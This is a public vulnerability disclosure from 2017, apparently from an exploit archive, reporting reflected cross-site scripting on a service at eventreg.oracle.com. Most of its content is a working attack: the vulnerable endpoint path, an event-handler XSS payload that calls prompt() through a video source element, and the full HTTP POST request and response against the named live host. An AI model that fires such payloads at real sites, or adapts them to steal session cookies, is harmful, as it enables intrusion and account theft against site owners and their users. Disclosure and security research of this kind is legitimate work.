Oracle Cross Site Scripting

eventreg.oracle.com suffers from a cross site scripting vulnerability.


MD5 | 1a3cc8c008bca4a51860ddf21b3ec91b

# Exploit Title: [ POST BASED XSS at ORACLE ]

# Date: [ 18 Oct 2017 ]

# Exploit Author: [ Ismail Tasdelen ]

# Vendor Homepage: [https://www.oracle.com/]

# Software Link: [ Oracle App Service ]

# Version: [ Oracle App Service - XXX2017OCXXX ]

# Tested on: Chrome / FireFox / Opera / IE / Safari Browser

# Description :

This script is possibly vulnerable to Cross Site Scripting ( XSS ) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script
should be trusted or not, it will execute the script in the user context allowing the attacker to access
any cookies or session tokens retained by the browser.

# Url address : eventreg.oracle.com

This vulnerability affects /certainApp/App/services/trigger.cfm

# XSS Payload : POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)">

# Attack Details :

URL encoded POST input callMethod was set to POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)">
The input is reflected inside a text element.

# HTTP Request / Response :

[+] Request ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

POST /certainApp/App/services/trigger.cfm HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Referer: https://eventreg.oracle.com:443/
Cookie: applicationName=oracle
Host: eventreg.oracle.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

POSTsoap=SOAP%20POST&callMethod=POSTsoap%3dSOAP%2520POST<video><source%20onerror%3d%22javascript:prompt(998299)%22>
&callService=profile&gogo=true&path=/data02/webapps/certainApp/App/services&PROENCODEDID=94102&SESSIONTOKEN=1&showNavigation=false

[+] Response ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HTTP/1.1 200 OK
Date: Wed, 18 Oct 2017 19:28:18 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000; includeSubDomains
x-xss-protection: 0
Set-Cookie: applicationName=oracle;Domain=.eventreg.oracle.com;Path=/;Expires=Thu, 19 Oct 2017 19:28:18 GMT;Secure;HttpOnly
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=900, max=95
Connection: Keep-Alive
Original-Content-Encoding: gzip
Content-Length: 3011

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

Related Posts